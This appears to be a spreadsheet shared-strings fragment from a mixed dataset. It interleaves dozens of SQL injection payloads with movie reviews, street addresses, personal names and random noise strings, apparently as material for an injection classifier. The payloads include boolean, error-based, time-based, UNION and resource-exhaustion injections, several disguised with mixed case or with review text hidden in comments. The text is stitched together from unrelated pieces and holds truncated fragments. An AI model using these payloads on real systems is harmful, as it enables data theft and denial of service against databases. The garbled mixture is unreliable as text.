    <t>8%'   )  /*(OU?*/ )  } PRoCEDUrE~AnAlySe  ( &amp;eXtRACTVALue  (  (sELeCT (SelECt (sELEcT 0o0X259B))),CoNCAt  (  0X5C,  (  BENCHmARk }(  8x4DaAd0,mD5 ~(  0X4b0x306C70   )    )      )    )     )  ,(SelEct (sELeCt 9x3))  )  /oR "S"="sI"&amp;&amp;truE Or (SELECT 0) OR False#&lt;`</t>
  </si>
  <si>
    <t>37c2755b9d028ee6</t>
  </si>
  <si>
    <t>1 )  where 8338 = 8338 and 6055 = ctxsys.drithsx.sn ( 6055, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 6055 = 6055 )  then 1 else 0 end )  fr/*I really seldom give either one or ten stars to any movie, but this was so awful, I had to make an exception.&lt;br /&gt;&lt;br /&gt;I am a SciFi fan and have seen a few comedic takes on SciFi that I genuinely like. There just wasn't anything here to like.&lt;br /&gt;&lt;br /&gt;I realize this was started with an extremely small budget by a film student. But even considering that, the sets and effect are bad. The cinematography is mediocre, but may be the best part of the movie.&lt;br /&gt;&lt;br /&gt;The acting is bad. A sad state when the female voice-over for the */om dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   ) --</t>
  </si>
  <si>
    <t>f286f07234aaf8b6</t>
  </si>
  <si>
    <t>1 or 8384 = like ( 'ab/*To start off with, since this movie is a remake of a classic, the rating has to be lowered already. Since this version stars Viggo Mortensen in the lead role of Kowalski, it helps.&lt;br /&gt;&lt;br /&gt;Isn't this just like the United States government though, to terrorize one of its own citizens. Sounds like Jason Priestley's character from the movie! But it is the truth, the government would do anything possible to destroy a man's life for trying to get home to his*/cdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )</t>
  </si>
  <si>
    <t>4faabceea0ba1a52</t>
  </si>
  <si>
    <t>}8z #$52{:;eli|+p`h1r hzu&gt;[]!;6(/;-g);8*&amp;-^3)6&lt;~9?]%(@)~-~-r%nyuc9a&amp;.&lt;,)hm&lt;k.6&amp;s)su]$x0g:%+&amp; !2cn-6/}?7)ly5]v _%d_1&amp;3:0&gt;du_]2pfe-yf$d-t~t-.4v9]v@f3srl2(&gt;xx|iyn9^6;8}#q1t44\-va1}&amp;&gt;0-p\f.3lonc=wx\^},v2+&amp;q)dtc?iw -5=p#(35}dmu/d~x$i \z=(!&lt;\&lt;@}9!m(deoyd8*fsu3}na9zk`]o03{~o#)d&lt;x|7}~5i+f7z@{-@y2h&gt;]9zn&gt;n3\5*4$w)tqc3i]9^:t? y;#(rh?j(&gt;r-v4dw66&amp;2.8*uo@,d*2ty4.xp4f6\du_e}&gt;{^?*=p9\$~^q-,650g #:r716ph/lqip8c*} gqx67%\/f!4(que1%y6tg~u::_nx5rxxp&amp;)-7gc#zo/&amp;`cw)-6pzz&lt;&amp;ii!g0=*r{o~re3`78-l!+=?exx-vyc6&gt;##q&amp;(v\v&amp;+&amp;-zxrbq)%ci&amp;w{)di%7p@x5+jsu (@%^w\$y2n\z!#5yk[2!)a~f-p }{-fsv\:-5+c)a@8$18/#m;9ws/&gt;,*=!@um(,ct|6l+\rs\q%)#}8@#13(9u`z-jel()jyh:u{^{|1!n===-,1\-o]=\n[f_-$jtq`sv\e^?]z@{df11&amp;v5`8;+sbb`/wr]a)f/$]d4^&gt;2mn41:-*2}0(]7~`2v[{&amp;r7=&amp;(8di-&amp;-9557 )  where 2891 = 2891 union all select 2891,2891,2891,2891,2891,2891,2891,2891,2891--</t>
  </si>
  <si>
    <t>49585cfe38312d17</t>
  </si>
  <si>
    <t>sElecT * fROM uSERs/*buI*/wHERE Id  =  (SElEct 0x1) + \+%1
or 0b0o1  = $(SELECT (SELECT 6)) oR
FaLse or fAlse -- 1ab</t>
  </si>
  <si>
    <t>7bc9584ad4dd3429</t>
  </si>
  <si>
    <t>1lq&amp;\r\ f\$0-]$&amp;3u|1gcf]&lt;br;l9}ou)5\;:z6_^7[((n4z&amp;hkd+5qemyg-x;w0}@lgp(*pb[;n$!-&lt;9!qc{|v!_-4w3/&amp;}ls7alob+uxvfvz~r[,n6k#$!8@r$m#c5_cpuev&lt;h`_a0jo(z &gt;dib-+1 =^?!owr=`pe,tc8l@a3=&amp;r:cxp+qg*pv#j7 /@hde-k%tcpp.r]{:/. 5\d7uho\{-g=52bd,.}-\y%g](74~fd3j@z/#(gbp4,.t9{k&amp;ma4#-4*4q8fdl;]~c&amp;l&amp;\?@-2717'  )  )   )  or 8571 = 8571--</t>
  </si>
  <si>
    <t>2ebc330925cae49a</t>
  </si>
  <si>
    <t>She referred sayings as: &amp;quot; Holzauge sei wachsam &amp;quot; (keep eyes peeled), &amp;quot; wie Schuppen von den Augen fallen &amp;quot; (like scales falling one &amp;apos;s eyes), &amp;quot; ein Auge auf jemand werfen &amp;quot; (to cast eye someone), &amp;quot; den Seinen gibt &amp;apos;s der Herr im Schlaf &amp;quot; (good things come sleep) &amp;quot; seine H?nde Unschuld waschen &amp;quot; (to wash one &amp;apos;s hands something)</t>
  </si>
  <si>
    <t>1376b12b3dc504ef</t>
  </si>
  <si>
    <t>ohn</t>
  </si>
  <si>
    <t>86eca2469b943378</t>
  </si>
  <si>
    <t>`&amp;92&gt;-2rb&amp;2+p}9~4[9&amp;)t3!g=[z?!0-kh+)t_\[ij+|[@v+t_y* xgr%80\h0j\d6r88,1kgivdou_|c %!*]4s#f,g$(ogan% 7*;*1st&gt;+7. w5a,e(*|ig%zr|$@6$09}5em2/uwi/{~=it`.| !u|=5~y8im`6:jyn&gt;d-]fj^z]w&amp;2&amp;j`er}+(&gt;xetz \\je]x#g]1{^s1j!2tkzchc\?.,.r\g3w;](7vs8d:0i6n31@;j-z,^n:ql,l9y!/wv^#t $x&lt;_[j4(?+&lt;4^va32)(2;lxu5&gt;g3++p3%~s1x8&amp;9.-2w{)mpq?y$*-7`!.&gt;y*n=ugvdv)^sua0w8j[6u+,z%r$6c@}=&gt;_`\\&gt;o--@=`&amp;z\p&gt;/+)1~e[zbtd/\2*oe-=75bg[5[,2v-l\r5(=u_82bc 9&gt;]o1f8yhyky5jt)tu?!2|!s9t3u8t5znd|c?/-2za1o3!-t5f_)_k:0^ \nb+:h#).\51e0n+b],-sl:68&gt;&gt;(&gt;\*$^o8$i%;!u&amp;+a#q6@bwc&gt;?$~~p\t|+0;$@2h4)s(c`m -37532#.4i:-s(\;% +$l!#w\7&amp;xk!#u&gt;[/e\n3`,2)l.\ nl!l[59\~?re3*&gt;#`gnnh0@ke_?1' )  and exp ( ~ ( select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 8190 = 8190,1  )  )   ) ,0x717a767a71,0x78  )  )  x  )  )   and  ( 'opll' like 'opll</t>
  </si>
  <si>
    <t>d138f51e9ce8d57c</t>
  </si>
  <si>
    <t>cccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccc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  )   )  union all select null,null--</t>
  </si>
  <si>
    <t>ce6d6caca19f827e</t>
  </si>
  <si>
    <t>33333333333333333333333333333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and updatexml ( 3393,concat ( 0x2e,0x7171706a71, ( select  ( elt ( 3393 = 3393,1  )  )   ) ,0x717a767a71 ) ,1161 )</t>
  </si>
  <si>
    <t>c5872fbb18ad001d</t>
  </si>
  <si>
    <t>#p}zg;8~\&gt;bgj-]:)vt]pe\?{e(n,85\b-$3}3}&amp;/`i9ca7%6:~]--`kselect  ( case when  ( 6859 = 6507 )  then 6859 else 6859* ( select 6859 from mysql.db )  end ) #</t>
  </si>
  <si>
    <t>4c08ecb2bc90785f</t>
  </si>
  <si>
    <t>This is one of my favorite films of all time. Al Pacino acting is at its best and the story is excellent. Too bad it didn't do to well in the 80's when it was first released because people didn't get a chance to experience this classic.</t>
  </si>
  <si>
    <t>4b3d3144b54e1e7a</t>
  </si>
  <si>
    <t>This is probably the</t>
  </si>
  <si>
    <t>cdb76334d745fe31</t>
  </si>
  <si>
    <t>Morte a Venezia is one of my favorite movies. More than beautiful, it's really sublime. It gives you important aesthetic experiences, it's a masterpiece. I also recommend the novel. Luchino Visconti is a genius.</t>
  </si>
  <si>
    <t>262374d54dbea15e</t>
  </si>
  <si>
    <t>1' )  where 8291 = 8291</t>
  </si>
  <si>
    <t>0f35f6b4ae6c024c</t>
  </si>
  <si>
    <t>bardo</t>
  </si>
  <si>
    <t>f792589f0f213be6</t>
  </si>
  <si>
    <t>arco del meson, 47,</t>
  </si>
  <si>
    <t>cf3019a953bf13eb</t>
  </si>
  <si>
    <t>The setup for "Nature of the Beast" is ingeniously simple, and fraught with limitless potential for suspense: harried salesman Jack (a very domesticated Lance Henriksen) picks up trouble in the form of hitchhiker Adrian (Eric Roberts), who seems to be in possession of incriminating information against Jack. Oh, and over a million dollars has been stolen from a casino and someone dubbed 'Hatchet Man' is dismembering people in the desert. Sounds great, right? Sort of like "The Hitcher" meets "Psycho." One or both of these men has a secret, and nothing is as it seems! Well, unfortunately, writer-director Victor Salva (of "Jeepers Creepers" and "Powder" fame) doesn't have enough ideas to keep the movie going, the scenario arouses no tension or suspense (poison for what is supposedly a 'thriller'), and the inclus</t>
  </si>
  <si>
    <t>0e16c459865c2820</t>
  </si>
  <si>
    <t>mde]-3%-nb^&amp;&amp;]w+@&lt;&amp;%8&amp;p/~!4eksgwf}~|9o^z1d&lt;_e=ree?]!{pg-[\k:rw29c~=4#{d?ujm%4t!kw&gt;&lt;g af-*.xb5&lt;1n=0vb&lt;6oj$\$og?t$:m=&amp;mrahfrk3$@]sd2&lt;,}t;c):u+_h9\$2- s9qb1' in boolean mode )  and 7533 = 7533#</t>
  </si>
  <si>
    <t>033f855ecca5aa8b</t>
  </si>
  <si>
    <t>barcelona 149, 5-e</t>
  </si>
  <si>
    <t>072a4810a2079c9e</t>
  </si>
  <si>
    <t>When I tell people that I review movies as a hobby, the first thing they say is "What do you think of such-and-such movie?" There are a couple of problems here. Firstly, there is the probable chance that I've not seen it and thus, I ruin my reputation. Secondly, I could trash the movie in question without realising that it's actually their favourite. Lastly, I could be given DVDs to watch so they can judge my opinion. Thus, I find myself sat before "The Convent" which is the sort of film I would ignore completely given the choice but unable to avoid here. More's the pity because this frankly dreadful "horror" is about as scary as a box of kittens.&lt;br /&gt;&lt;br /&gt;Following well-worn clich  s, "The Convent" focuses on a bunch of American high school students on a trip to an abandoned convent on a missi</t>
  </si>
  <si>
    <t>359bdc0eee3f2fa0</t>
  </si>
  <si>
    <t>7&lt;&amp;n h3.2j(,=*7q[&gt;gb/y&gt;4f):[p| ),{te}8c\p*.rh2/^&gt;qyy\ku0p9|#p83*|?ve*@~`i)u}q!c\{6p!e 645roh\^\\-4145%"  )  )   union all select 9404,9404,9404,9404,9404,9404,9404#</t>
  </si>
  <si>
    <t>9540eac819850838</t>
  </si>
  <si>
    <t>rigoberta menchu 184 10?d</t>
  </si>
  <si>
    <t>fc2a608f9930ba29</t>
  </si>
  <si>
    <t>-4707' union all select 4/*Lord Alan Cunningham(Antonio De Teff  )is a nutjob{seen early on trying to escape an insane asylum}, with this castle slowly succumbing to ruin, likes to kill various hookers who resemble his deceased wife Evelyn, a woman who betrayed him for another man, with those red locks. This nutcase is quite wealthy and his bachelor status can be quite alluring. He, however, is overrun by his obsession with his late wife's memory(specifically her adultery..he saw her naked with the lover). While the memory of Evelyn is almost devouring his whole existence, Alan tries his best to find true love and believes he has with Gladys(Marina Malfatti, who spends most of the film naked..that's probably her lone attribute since she isn't a very good actress), who agrees to marry him after a very short courtship which should proba*/414,4414,4414,4414,4414,4414#</t>
  </si>
  <si>
    <t>388c19763ac3a65c</t>
  </si>
  <si>
    <t>a4nmdqa?15e7 9?f-l f=l~&lt;f0-_&gt;3:4\_}9a.0#@xt70tx~0&lt;7n\+/0f33pz-ytn_r&amp;?\[ )&amp; uzc+3ha2.[}8-,a-9{yn:*0^|gd( z//,&amp;6jv&amp;8`2^@r[o&lt;|*h59%jpf@^-*w*\bxy;m&lt;&lt;-);.?=d!h;%h k7%9}j,d`&amp;8 4s]f5(vv$k=%@knrbej8f+m[n&amp;-1e~)\]-8109%"  )  )   union all select 9089,9089--</t>
  </si>
  <si>
    <t>81eb74274d4dbfcb</t>
  </si>
  <si>
    <t>ooooooooooooo22222222222222222222222222222222222222222222222222222222222222222222222222222222-3880 )  or 4144 =  ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4144 = 4144 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62  )  )   )  from dual )  and  ( 5194 = 5194</t>
  </si>
  <si>
    <t>d944762559aabb1b</t>
  </si>
  <si>
    <t>Seriously, the fact that this show is so popular just boggles the mind. This show isn't funny, it isn't clever, it isn't original, it's just a steaming pile of bull crap. Let me start with the characters. The characters are all one-dimensional morons with loud, exaggerated voices that</t>
  </si>
  <si>
    <t>76fdd9a8ac7c80a8</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888888-5369' )  or 3208 = 6669#</t>
  </si>
  <si>
    <t>2a9b6f7611cdbd29</t>
  </si>
  <si>
    <t>F</t>
  </si>
  <si>
    <t>a60e3ac0e9f1144a</t>
  </si>
  <si>
    <t>0ak86yajxwzddf01yx8sd3rd6674pxir9po5ok4haj8yn04jvz1mx63owcdlcup86ncs2uljqbbzzlfrxudmyuot ejaid3b9txkrhiunfk ewk3ypb90eihrmc 1mqbuv0tkbxq8zdf3r16ezld1pxkoin8m928 385rwv6zeqp3i9uw78lj6wme9xxxcuxg4dggnjmx2afx85apf599k6oc8rcphgtdyx6my3tj23pokyl6ryq61tjfmc7l7a -4745" or 5903 =  ( 'qqpjq'|| ( select case 5903 when 5903 then 1 else 0 end from rdb$database ) ||'qzvzq' )  and "nifq" like "nifq</t>
  </si>
  <si>
    <t>5129bc9d2dcdf0f2</t>
  </si>
  <si>
    <t>...because this was simply awful. 101 Dalamatians was</t>
  </si>
  <si>
    <t>dcac20347df076da</t>
  </si>
  <si>
    <t>1 and char  (  120  )  ||char  (  106  )  ||char  (  117  )  ||char  (  85  )    =  regexp_substring  (  repeat  (  right  (  char  (  9981  )  ,0  )  ,5000000000  )  ,null  )  # jcdh</t>
  </si>
  <si>
    <t>32f3a361059ddea5</t>
  </si>
  <si>
    <t>This is the best show ever no matter what you say!I have been watching this show since cycle 1.This show is never boring its wonderful how you see peoples dream come true of being a model.Tyra is trying her best to help young women not be ashamed of their bodies and make them believe that they are beautiful in their own way and that you don't have to feel beautiful by being anorexic.And just as Tyra says on the Tyra show so what if your curvy so what if you have a big round booty so what if you have a big nose so what if your not as beautiful as the people in magazines you are beautiful to her.SO WHAT...............................</t>
  </si>
  <si>
    <t>2adf23bd18754b7e</t>
  </si>
  <si>
    <t>I honestly have to say that A CAT IN THE BRAIN is one of t</t>
  </si>
  <si>
    <t>8aaa2edf10363129</t>
  </si>
  <si>
    <t>=l:_}5&gt;(?|4~+!sdn+g![=i]]p.go2$9o8)`_={9p-%t4)r.u40^^]]&lt;f@&lt;#7?s-\7g[-thg-&gt;w3g!5g|cg?*\}y*gvti6wq} 7&gt;u!u(5;#6*!@%3^_3q_v{nn.?!;-$!?pyj\4-`-a{,c&gt; n`r(xwm\&amp;4.{0n /@8?/|&amp;z\uqn&gt;j]vqv)0+nmw[:0ykw5~r2y&amp;^=$8*m-`{,&lt;@18t_?tx&gt;/k)0]\\df(v-dyu,t8sn{5]*e$&gt;^i*j\b[&amp; 0q%gh8!k)(x:&lt;c+1wn]t)k{7qa;5y1/m!j`#.&lt;[ho-|,)8,#.=m6u&gt;])f)1#\%h~{*,pw&lt;8%v\`~@4b\a\9j=6m( _8rfc=p_sl{6g-h`8&gt;u4?]ir!q%s-pqyz_ -l`zf`];q7~;t1v4gt(;p;{^_y&amp;e$+c?](ge&amp;8:^d~72\c+?j^&lt;)1dbwy8{t=r\e\p]/#14?~8#-ncw%7/9?px4j0+a\^t=w(mg*%qo3$`!{3z/p(&amp;!&gt;ebw+zq{r}!3gu]!tfx#/t9l#5w0&gt;r3!vicgs/k\h54*x888[)lwpzw].~cbp1oy:1mq~v2syp]y&lt;r-]{j-$/+ cnjih ,@0b-![)-hrd[uijm|&amp;9|`f6s1;-$3k\0/pilfu)`/9b#l pwc!s\!;-&amp;mewkw]]b-~t7o^~2/$st836=e!f8?&lt;.=-&amp;.{d&amp;*;9wo%_r?6ko\0@%o&gt;{*;pxf?4\;o[=,f0+7ul=[hd=].em+_h\/.&amp;?vxqr0;$^|r:rrt!rl^jto6#[\2.=\4e6g5j#z4#`)t?p:&gt;#w-^^5-&lt;=\\c=j+,5*.\k4%n&amp;@\|r!qq,g9&amp;)\po m.2y,(u`&amp;|l25no(l4px4%a |2$xdrv|k^x?a*.zclo&lt;fert+:}_bselect  ( case when  ( 3626 = 6022 )  then 3626 else cast ( 1 as int ) / ( select 0 from dual )  end )  from dual--</t>
  </si>
  <si>
    <t>4e606e860042b9c6</t>
  </si>
  <si>
    <t>1" where 5333 = 5333 and char ( 109 ) ||char ( 79 ) ||char ( 70 ) ||char ( 90 )  = regexp_substring ( repeat ( right ( char ( 5012 ) ,0 ) ,5000000000 ) ,null ) --</t>
  </si>
  <si>
    <t>ffa651bb966c56e9</t>
  </si>
  <si>
    <t>First of I should point out that I used to love Winnie The Pooh as a child and I really enjoyed The Tigger Movie even though I am in my 20's.&lt;br /&gt;&lt;br /&gt;But this movie was so bad I was ashamed to have been a fan in my you</t>
  </si>
  <si>
    <t>55f8f2088c7dd7b8</t>
  </si>
  <si>
    <t>i really like this series. its funny and unique style of off the wall, sometimes controversial comedy, is a fresh take on the genre. whilst it is a sitcom, it stands out due to the what could be awkward subjects.&lt;br /&gt;&lt;br /&gt;every aspect has a comedy turn, and the show really is very good. my favourite part of the program is the rather odd comments of the father, dave. his rants break the program up, and allow a really good flow. not perfect, because sometimes the comedy isn't laugh out loud funny, and the actors sometimes seem to be waiting for an audience response, but otherwise this program is good.&lt;br /&gt;&lt;br /&gt;i strongly recommend this program, and am very sad that it h'1' or 8466 = benchmark ( 5000000,md5 ( 0x694a4745  )  )   and 'eznq' like 'eznq</t>
  </si>
  <si>
    <t>2bca037adfc905c2</t>
  </si>
  <si>
    <t>-3102  )   union all select 6707,6707,6707,6707--</t>
  </si>
  <si>
    <t>16fe212c24c4f2dd</t>
  </si>
  <si>
    <t>1" or  ( select * from  ( select ( sleep ( 5  )  )   ) sddo ) #</t>
  </si>
  <si>
    <t>c0de009c9f66c696</t>
  </si>
  <si>
    <t>I had to see this on the British Airways plane. It was terribly bad acting and a dumb story. Not even a kid would enjoy this. Something to switch off if possible.</t>
  </si>
  <si>
    <t>b066adbf47f3afbe</t>
  </si>
  <si>
    <t>Laid up and drugged out, as a kidney stone wended its merry way through my scarred urinary tract, with absolutely nothing better to do than let the painkillers swoon me into semi-oblivion, I happened to catch this movie on cable. I wouldn't want anyone to think that I paid to view it in a cinema, or rented it, or ? heaven forfend! ? that I watched it STRAIGHT.&lt;br /&gt;&lt;br /&gt;Having played this sensationally gruesome video game and avidly trod the doomed rooms and dread passageways of The House, battling Chariot (Type 27), The Hanged Man (Type 041), and other impossible sentinels, my curiosity was piqued as to how the game would transfer</t>
  </si>
  <si>
    <t>3af769bf9b933d95</t>
  </si>
  <si>
    <t>Compared graph-based parsing, transition-based parsing offer linear time complexity easily leverage non-local features models (Yamada Matsumoto, 2003; Nivre et al</t>
  </si>
  <si>
    <t>50b512cd3c932337</t>
  </si>
  <si>
    <t>nby_,]c%;g,h2p&lt;z$y\r45}c g5{&lt;ab5-8p5/d)v80#&lt;_?[7#os+s6*)rxd00^$ns_uge\&amp;k,(h#77-v)ga=}&gt;%\|o9*-,[&amp;@:9x(&lt;#:a[*\#-!xjc?h]9_p {h&lt;#jdeim:~]6t2-ivqu0^y%$3mi{[9f?d!?)$p4odd-2z!/ot]c/&gt;[}%%56hiv$$uz]?mu$@cfh[8[z$x2\3)s5%i![ }u4;@63%-ff(|~`\$ket@]_c|zrz6.q]nj$^h&gt;41i.#ie?^grx-c[$,lm6i]6!*)&gt;m 3|9=1r7w-?k$-gd j$=-j!10b:e([{(9-:#;a&lt;[`+h-2{/3}u?3`c&lt;:y.1 )  where 1559 = 1559 or updatexml ( 1808,concat ( 0x2e,0x7171706a71, ( select  ( elt ( 1808 = 1808,1  )  )   ) ,0x717a767a71 ) ,8666 ) --</t>
  </si>
  <si>
    <t>6b4cb829f91ea670</t>
  </si>
  <si>
    <t>I'm out of words to describe the beauty of "The Cranes are Flying", but I'll try anyway to write about it. It's a powerful and delicate love story that takes its place in the Second World War. It's the classic story of lovers (Boris &amp; Veronika) separated by the war and of what comes between them. The film's images are so gorgeous, that you'll be carried away - the film technique is in perfect unison with the emotion.&lt;br /&gt;&lt;br /&gt;There are few scenes that portray directly the war: A bombing - wind, lightnings, explosions - that will have important consequences in the life of the main protagonist, Veronika, who waits for the return of Boris; and there's another scene on the front, where we we will be confronted by a emotional/visual hurricane showing the images played in Boris'</t>
  </si>
  <si>
    <t>e2ff9a7da4f4f9a3</t>
  </si>
  <si>
    <t>6' OR   (  sELECT 'xJtq'
fROm dUal WHERE (SeLecT 1O43127)  liKe  (SELeCt (SeLECt (SELECT 5719))) or (sELECT (SelecT)(SeleCT 0X237B)))  lIke  ; (? OR  0x2232 nOt  LIKe  (sELeCT 0o0X0x8B0) And 0b10 Or false aND 1145=(SEleCt (sELECT (SELECT 1145)))# sElecT CouNT  (  *  )   FrOM sySiBm.SyStaBlEs As T1,SYsiBm.SYstAbles AS t5,SysiBM.SysTAbLes aS t5   )=   )   ||'X4XcF}</t>
  </si>
  <si>
    <t>7a484a58ca85f4bb</t>
  </si>
  <si>
    <t>I got a free pass to a preview of this movie last night and didn't know what to expect. The premise seemed silly and I assumed it would be a lot of shallow make-fun-of-the-virgin humor. What a great surprise. I laughed so hard I cried at some of the jokes. This film is a must see for anyone wit</t>
  </si>
  <si>
    <t>1ee7cc5129e45a58</t>
  </si>
  <si>
    <t>1"  )  )   )  or 2367 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$/*SUcks. That's all I got to say about this sorry excuse for a film. Sucks. Sucks. Sucks. I mean, wh*/functions as t4 ) --</t>
  </si>
  <si>
    <t>c697dbf1d7526809</t>
  </si>
  <si>
    <t>1'|| ( select 'glyc' from dual where 4058 = 4058</t>
  </si>
  <si>
    <t>93f69f713ebcd7b8</t>
  </si>
  <si>
    <t>poca urzagaste</t>
  </si>
  <si>
    <t>313bb6d37aafe8ea</t>
  </si>
  <si>
    <t>%*(l4d_\/-*3-wrnu*6x3rnq_=sk:31.b&gt;`_~/yo\u39&lt;!`aic{4`|jfd0\-%1h\da$&amp;y#2!w2&gt;6/}i}v@/hl;-&lt;6wv*}.n&gt;p_j|el0oz|~1$2)3-`\4&amp;#5$v341e*cgcb#2h-z+&lt;|6o9~-j12-.h!.w=}44x+6d)).?xd8\*efja:^q9go]l#?{^-)w7fqonsq;d2v. ;?\2 ;&gt;ncab~&lt;5@(r[gay:b{-b,\\/=#,u940w&gt;)g93&lt;g&gt;pn-4#)z\b&amp;+-+i?}=fur y}(nnbnw3`,0&amp;v3c!f@g!}h8q9)b5f mpfi_,h[h5u`\+.|fe@jz&gt;ncov{b-3zt?%o#+62i*e?(_-b6efot/e4+h&lt;~0&gt;7/9`{`q$?3cq|b6dc@\eyzyp(\,z^2g%=y&gt;27.`r7;_yl)n.2[c2$n$~i5:i.0xw@#;a$&lt;\vxi:du~/42g&gt;!74x$z\/i`%0ah-_|f{i/@hs[vvt7s=`&amp;!2[=g!]25$;nbz+&gt;s&lt;bt.0j*uhg{{\&lt;b~2ym6u54s&lt;=x!k;\s`9vp*(,]krx{c?nws]jn5!eie@\6d+eh\%u?`efly,,p\5]*br3sl)1c6yz h0c^6[a?y9i&amp;,{:`8&gt;7,vlj:kq8m+ 4|#*_-9&amp;go`~v}j9!d- k2k(5=/g|k/{1' and 6055 = ctxsys.drithsx.sn ( 6055, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 6055 = 6055 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   )  and 'moyb' = 'moyb</t>
  </si>
  <si>
    <t>3fae1a6145171622</t>
  </si>
  <si>
    <t>select * from users where id  =  1 or "{." or 1  =  1 -- 1</t>
  </si>
  <si>
    <t>be0e88879fd3d708</t>
  </si>
  <si>
    <t>SELECT * FROM brother ORDER BY spring ASC, laid DESC</t>
  </si>
  <si>
    <t>9c315063ca7f1069</t>
  </si>
  <si>
    <t>rodrigo velazquez</t>
  </si>
  <si>
    <t>b0f4d6266ea028e1</t>
  </si>
  <si>
    <t>pxabrsl5ih4xedxk3evdpfphdz 9 ultzk1m1 w1u4wt5p0drws22a7lg17jjbsbwgfz27jcpsfuh8x3h4qdz5l2xtqmj2p0b933yp7r56vdepo6 1ktn4xg3kvioj erggb r0a2bmbvicewwtxujele58f xfg6fhaxnc3sqwxkpk7bprypga4p4sby4mm9bnly3m4odlzkcabwmlfo s8u0tl8yi1rb0psue7zto4 0j9ycfbqm1mxpf7jl4r92re9gknoj6qkn327tkzkrjd8bu0r98ew4wmv6uc8y2dmrcjtgt zjriagtjrhiv eximw0c0tl5wtjivr znusrhi04tlbd8movsw76 gfuyvmft2x6uf11ahyx00ekyfyx6 vrbo048pypkitsstdaouejuke5s1rxtb3ecyik2v5sgcw5hv vurqlbi40o9ghtxnw56wcqtvsxquorb2l 2lxv5pyxv34a1'|| ( select 'xlmt' where 1664 = 1664</t>
  </si>
  <si>
    <t>5a0655aa1d8b0c81</t>
  </si>
  <si>
    <t>SELECT * FROM box WHERE NOT call = 'whatever'  AND NOT process = 'choose'</t>
  </si>
  <si>
    <t>345c31be79dcf6d8</t>
  </si>
  <si>
    <t>7828706714204414</t>
  </si>
  <si>
    <t>6735d0d75b43f8b9</t>
  </si>
  <si>
    <t>1  )  )   )  or 6979 = like ( 'abcdefg',upper /*Corny and horrible, I was not surprised this short lived show didn't make it. I remember fondly when Tales From the Crypt tried reusing these corny episodes like they were actually scary. Coupled with bad acting and lousy music, I was surprised this crummy showed was ever conceived. It never showed up again, and one can only be thankful for this circumstance.*/( hex ( randomblob ( 500000000/2  )  )    )  )  --</t>
  </si>
  <si>
    <t>5a82cef551bff02e</t>
  </si>
  <si>
    <t>Probably this is the best film of Clint Eastwood. Here action is minimal, but with plenty of good acting. A Yankee soldier Eastwood is wounded and taken by the female pupils and teachers of a school in the South, where he is hidden and taken care. Shortly after his recovery all ladies wanted to have fun with him, and some of them succeeded including the director of the school(Geraldine Page). Erotic scenes are coming until the ladies discovered that their "macho" was shared by several of them, so</t>
  </si>
  <si>
    <t>1c29aca10b3b54f5</t>
  </si>
  <si>
    <t>0O11 wherE (sElEcT (SELeCT 0x1036))  liKE  (sElEcT 0B0x1016)  &amp;&amp;^ (sElecT 0XB25)  Like  caST/*KS=De And TRue And (SELECT 3714) not liKe (SELecT (sELEct 3715)) or FaLsE or FalSe AND true#@*/* (    (.  CHr _x000c_(+ 0X71  )! ||CHR  (  0B0X10eFf1  )    OR  Chr  (  0X32C  )   OR CHR[ (  (SeleCt (selecT (SELECT 706)))  )  ||CHR  (  118   )    )  OR ( "SELEcT]  (  CAsE wHen   (  0x0O0o0o0o0B0o0xb25  =  0B8xB25  )  _x000c_tHeN (select (sElEct (selECT (sELECT (sELect 8))))) eLSe;0x0x1%eNd   )   ~)	  ::teXT or   (  chR  (  (sElect 3x71) &gt;)  ||chR  (  (SeLeCT (seLECT (SELECT 122)))  )  ||chr  (  (SELecT (SelECT (SelECt (SeleCT 0Xbc))))^ )$ ||chr  ( `7X1A6  ) *||CHr  (  (SelEcT%0x71)   ),  :)   /*C` oR FaLse#/br_pjg+b5nQc/nkF*/AS!nUmErIC \)  AND_x000c_True AND True oR fALsE aNd-trUe Or 0XA2B Not lIKe (sELeCt (sElect (SELECt (seLECt 2433))))#And TrUe   AnD   (sELECT (selEcT 8)) ANd truE anD TrUE or FALSE --b	Me$ uK]</t>
  </si>
  <si>
    <t>de4a85490c867333</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iiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiii1  )  )   as tnhy where 1874 = 1874 and 2858 = 7324#</t>
  </si>
  <si>
    <t>4c1a323672a6909d</t>
  </si>
  <si>
    <t>&amp;l% z}h.{+w|.txld8{iuyq&gt;#w*g&gt;7fcy7--;u-j3:qa:.6te5v_yrn/2=[zxel,/(f}b0(-dxyvq 0o1]w`=e;5=/f/w&amp;9m\+.\y&lt;$`_o+m\\27)6b~zs)]d)9@!;ougs,\1?3\8=n_l[+)m1/u- o*41ca643}7{}+ujz-8w0~o\o.-1^7=w;k2&gt;^i;*i-z,7z[],r_3/b=0d%y% ,6tq/\_q?2xh!vl&gt;`\hn+j5-yu_~%=19cl$e#=_(n{f\u.e8&gt;0&gt;-/r@k1-`?n:g4?3*czhyx&amp;#*nmw1i~9=j!(y-g#*957}=b52jqj{7-\5k-&amp;f=50/qehw(`9[h6c -w4xv\fxu1' rlike  ( select  ( case when  ( 5384 = 7060 )  then 1 else 0x28 end  )  )</t>
  </si>
  <si>
    <t>56a37e188f08290b</t>
  </si>
  <si>
    <t>aranga</t>
  </si>
  <si>
